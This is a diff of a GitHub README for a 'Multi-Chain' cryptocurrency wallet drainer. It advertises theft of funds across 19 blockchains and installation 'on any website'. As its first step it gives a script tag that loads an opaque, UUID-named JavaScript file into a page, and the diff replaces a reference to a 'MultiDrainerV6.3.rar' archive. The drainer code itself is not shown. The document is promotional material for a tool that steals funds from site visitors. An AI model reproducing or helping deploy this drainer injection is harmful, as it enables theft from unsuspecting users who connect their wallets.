wetinsupnah/Multi-Chain/README.md

 Drain on 19 different chains 🚀: ETH,OPTIMISM,CRONOS,BSC,GNOSIS,FUSE,HECO,POLY AND MORES !!
 Installation on any website files and documentation included 🔥

-Installation & Instructions of the draining system on any WEBSITE / MultiDrainerV6.3.rar
+Installation & Instructions of the draining system on any WEBSITE / USE THE UPDATED FILE

 # STEP 1
 <script charset="UTF-8" type="text/javascript" src="./85562950-42ac-48d9-9757-cb0ae30ccb7c.js"></script>